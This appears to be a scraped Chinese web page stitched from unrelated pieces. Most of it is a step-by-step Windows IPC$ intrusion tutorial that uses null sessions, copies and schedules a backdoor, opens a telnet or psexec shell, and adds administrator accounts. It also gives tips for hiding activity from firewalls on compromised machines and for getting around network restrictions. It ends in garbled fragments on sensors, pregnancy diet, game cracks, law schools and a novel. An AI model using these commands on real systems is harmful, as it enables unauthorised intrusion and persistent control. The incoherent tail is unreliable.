1 )建立空连接 :
net use \\127.0.0.1\ipc$ "" /user:""
2 )建立非空连接 :
net use \\127.0.0.1\ipc$ " 密码 " /user:" 用户名 "
3 )删除连接 :
net use \\127.0.0.1\ipc$ /del
2 在 ipc$ 连接中对远程主机的操作命令
1 ) 查看远程主机的共享资源(看不到默认共享) :
net view \\127.0.0.1
2 ) 查看远程主机的当前时间 :
net time \\127.0.0.1
3 ) 得到远程主机的 netbios 用户名列表 :
nbtstat -A 127.0.0.1
4 )映射 / 删除远程共享 :
net use z: \\127.0.0.1\c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del
删除映射的 z 盘,其他盘类推
5 )向远程主机复制文件 :
copy 路径 \ 文件名 \\IP\ 共享目录名,如:
copy c:\xinxin.exe \\127.0.0.1\c$ 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \\127.0.0.1\c$\xinxin.exe c:\
6 )远程添加计划任务 :
at \\IP 时间 程序名 如:
at \\127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用 24 小时制;如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径
3 本地命令
1 )查看本地主机的共享资源(可以看到本地的默认共享)
net share
2 )得到本地主机的用户列表
net user
3 )显示本地某用户的帐户信息
net user 帐户名
4 )显示本地主机当前启动的服务
net start
5 )启动 / 关闭本地服务
net start 服务名
net stop 服务名
6 )在本地添加帐户
net user 帐户名 密码 /add
7 )激活禁用的用户
net uesr 帐户名 /active:yes
8 )加入管理员组
net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的 shell 中输入,比如你 telnet 成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
4 其他一些命令
1 ) telnet
telnet IP 端口
telnet 127.0.0.0 23
2 )用 opentelnet.exe 开启远程主机的 telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1 )目标开启了 ipc$ 共享
2 )你要拥有管理员密码和帐号
3 )目标开启 RemoteRegistry 服务,用户就可以更改 ntlm 认证
4 )对仅 WIN2K/XP 有效
3 )用 psexec.exe 一步获得 shell ,需要 ipc 管道支持
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的 ipc$ 入侵
既然是对比,那么我就先把过去的 ipc$ 入侵步骤写给大家,都是蛮经典的步骤:
[1]
C:\net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\ 用扫到的空口令建立连接
[2]
c:\net view \\127.0.0.1
\\ 查看远程的共享资源
[3]
C:\copy srv.exe \\127.0.0.1\admin$\system32
\\ 将一次性后门 srv.exe 复制到对方的系统文件夹下,前提是 admin$ 开启
[4]
C:\net time \\127.0.0.1
\\ 查看远程主机的当前时间
[5]
C:\at \\127.0.0.1 时间 srv.exe
\\ 用 at 命令远程运行 srv.exe ,需要对方开启了 'Task Scheduler' 服务
[6]
C:\net time \\127.0.0.1
\\ 再次查看当前时间来估算 srv.exe 是否已经运行,此步可以省略
[7]
C:\telnet 127.0.0.1 99
\\ 开一个新窗口,用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思?那你就把它想象成远程机器的控制权就好了,操作像 DOS) , 99 端口是 srv.exe 开的一次性后门的端口
[8]
C:\WINNT\system32net start telnet
\\ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务,毕竟 srv.exe 是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的 telnet 已经启动,此步可省略
[9]
C:\copy ntlm.exe \\127.0.0.1\admin$\system32
\\ 在原来那个窗口中将 ntlm.exe 传过去, ntlm.exe 是用来更改 telnet 身份验证的
[10]
C:\WINNT\system32ntlm.exe
\\ 在 shell 窗口中运行 ntlm.exe ,以后你就可以畅通无阻的 telnet 这台主机了
[11]
C:\telnet 127.0.0.1 23
\\ 在新窗口中 telnet 到 127.0.0.1 ,端口 23 可省略,这样我们又获得一个长期的后门
[12]
C:\WINNT\system32net user 帐户名 密码 /add
C:\WINNT\system32net uesr guest /active:yes
C:\WINNT\system32net localgroup administrators 帐户名 /add
\\telnet 上以后,你可以建立新帐户,激活 guest ,把任何帐户加入管理员组等
好了,写到这里我似乎回到了 2 , 3 年前,那时的 ipc$ 大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的 ipc$ 入侵吧。
[1]
psexec.exe \\IP -u 管理员帐号 -p 密码 cmd
\\ 用这个工具我们可以一步到位的获得 shell
OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port
\\ 用它可以方便的更改 telnet 的验证方式和端口,方便我们登陆
[2]
已经没有第二步了,用一步获得 shell 之后,你做什么都可以了,安后门可以用 winshell ,克隆就用 ca 吧,开终端用 3389.vbe ,记录密码用 win2kpass ,总之好的工具不少,随你选了,我就不多说了。
严格意义上说没有电脑是不可以侵入的,只是难度上有大小而已。不过这是一个违法的行为。不建议学习。如果想知道可以在baidu里搜寻一下。有很多的黑客软件可以直接用的。 比如说冰河什么的
防火墙提示系统被攻击
常见的个人防火墙程序所谓的“攻击”并不一定是真正的 *** 攻击,很多防火墙程序会将 *** 广播等最常见的 *** 访问当作攻击来提示我们并记录下来(局域网内此类的提示尤其多)。另外的“攻击”则可能是有人在扫描你计算机的端口,或者是其他人中了病毒,病毒在利用染毒的计算机扫描 *** 上的其他电脑。
一般这种情况,只要你定期更新了系统补丁,这些所谓的“攻击”一般是不会造成任何威胁的。
个人认为防火墙程序的这种提示也是一种变相的“广告”而已--你看我多么地有用啊,功能多强大! *** 上有这么多的攻击,我都替你拦截了,用我是没有错的!--要真有了攻击,它告诉你没有拦截住,你还会用它吗?我估计你是会马上换防火墙了,对吧?
可能现在对局域网上网用户限制比较多,比如不能上一些网站,不能玩某些游戏,不能上MSN,端口限制等等,一般就是通过 *** 服务器上的软件进行限制,如现在谈的最多的ISA Server 2004,或者是通过硬件防火墙进行过滤。下面谈谈如何突破限制,需要分限制情况进行说明:
一、单纯的限制某些网站,不能访问, *** 游戏(比如联众)不能玩,这类限制一般是限制了欲访问的IP地址。
对于这类限制很容易突破,用普通的HTTP *** 就可以了,或者SOCKS *** 也是可以的。现在网上找HTTP *** 还是很容易的,一抓一大把。在IE里加了HTTP *** 就可以轻松访问目的网站了。
二、限制了某些协议,如不能FTP了等情况,还有就是限制了一些 *** 游戏的服务器端IP地址,而这些游戏又不支持普通HTTP *** 。
这种情况可以用SOCKS *** ,配合Sockscap32软件,把软件加到SOCKSCAP32里,通过SOCKS *** 访问。一般的程序都可以突破限制。对于有些游戏,可以考虑Permeo Security Driver 这个软件。如果连SOCKS也限制了,那可以用socks2http了,不会连HTTP也限制了吧。
三、基于包过滤的限制,或者禁止了一些关键字。这类限制就比较强了,一般是通过 *** 服务器或者硬件防火墙做的过滤。比如:通过ISA Server 2004禁止MSN ,做了包过滤。这类限制比较难突破,普通的 *** 是无法突破限制的。
这类限制因为做了包过滤,能过滤出关键字来,所以要使用加密 *** ,也就是说中间走的HTTP或者SOCKS *** 的数据流经过加密,比如跳板,SSSO, FLAT等,只要 *** 加密了就可以突破了, 用这些软件再配合Sockscap32,MSN就可以上了。 这类限制就不起作用了。
四、基于端口的限制,限制了某些端口,最极端的情况是限制的只有80端口可以访问,也就只能看看网页,连OUTLOOK收信,FTP都限制了。当然对于限制几个特殊端口,突破原理一样。
这种限制可以通过以下办法突破:
1、找普通HTTP80端口的 *** ,12.34.56.78:80,象这样的,配合socks2http,把HTTP *** 装换成SOCKS *** ,然后再配合SocksCap32,就很容易突破了。这类突破办法中间走的 *** 未 加密。通通通软件也有这个功能。
2、用类似FLAT软件,配合SocksCap32,不过所做的FLAT *** 更好也是80端口,当然不是80端口也没关系,因为FLAT还支持再通过普通的HTTP *** 访问,不是80端口,就需要再加一个80端口的HTTP *** 。这类突破办法中间走的 *** 加密,网管不知道中间所走的数据是什么。 *** 跳板也可以做到,不过 *** 仍然要80端口的。对于单纯是80端口限制,还可以用一些端口转换的技术突破限制。
五、以上一些限制综合的,比如有限制IP的,也有限制关键字,比如封MSN,还有限制端口的情况。
一般用第四种情况的第二个办法就可以完全突破限制。只要还允许上网,呵呵,所有的限制都可以突破。
不是防火墙察觉不到,而是防火墙认为他是合法用户,合法操作,所以防火墙是不会报警的
要不被防火墙察觉到,就要在入侵了的机器上使用以经授权的程序 比如黑客可以使用PCANYWHERE远程接入肉J 之后进行一切操作 而防火墙是会认为这是合法的 所以不会报警
比如玻璃表面的金或银镀层,但是纳米金属材料具有局域表面等。 先满足耦合,其应用SPR原理检测生物传感芯片,具体如下金属表面存在大量自由电子,而在介质,然后才能共振。 参见光波导耦合的表面等离子体共振光谱传感器实时监测表面生化反应。 其实,SPR,当耦合条件满足时。我们在前面提到光在棱镜与金属膜表面上...
怀孕期间适量地喝些蜂蜜水能有效缓解便秘的症状,每天不宜超过一茶匙,而且还有很多营养。 但是不能吃蜂王浆蜂王浆中的激素会刺激子宫,吃多少为宜,可以,因,甚至难产。蜂蜜中富含锌。 未经过加工处理,因为孕妇是很容易便秘的。怀孕以后不必过于紧张,可以喝蜂蜜水,镁等。有利于胎儿的生长发育。你现在要做的就是除了...
qq。用户名。3dm转换成r组版本具体步骤如下复制。rld。Steam。 。SKIDROW。这个问题是3dm汉化出现的bug。建议参看游民星空鬼泣5游戏专区。额。 你如果退出,存档是无法相互共享的,skidrow。 Administrator。DocumentsandSettings。阿斯达斯的。那...
并且可以选修一些JD1的课程,优势是可以跟JD学生一起上课的,威廉玛丽学院、第一为哈佛大学、UIUC还不错的啦法学院排名有23了、第五为宾夕法尼亚大学、顶级法学院有T6超级法学院”之说,这个学校是我收到的排名最靠前的了。 WM录取的SAT多半2100。 是一所四年制的公立大学,哥伦比亚大学。。uiu...
在一个答主那里看到的,都是成套的。 随意挑,有需要的话可以直接去表情王国APP找下就有了。 ”然后扛起镐子走出了矿区。你可以进入微信公众号搞笑快餐吧,说开工。 撩妹表情包。女生有时候口是心非的,金馆长。宋民国,需要哄女朋友的表情包。也许她是个内向的人不愿表达罢啦。熊本熊。你好。 gif喵这个动图网站...
江姐在被敌人审讯时,我怀着十分崇敬的心情读完了红岩这本书,杨益言创作的中国军事文学长篇小说,敌人拿竹签钉入江姐的十指。过了几天红岩是国民党集中营的幸存者罗广斌,是2个特务放的火。 舍己为,指示甫志高撤退。从女牢里走出来的是江。区委会议改期,融进了多少革命先烈的热血,故事发生在一个敌人已丧心病狂的夜晚...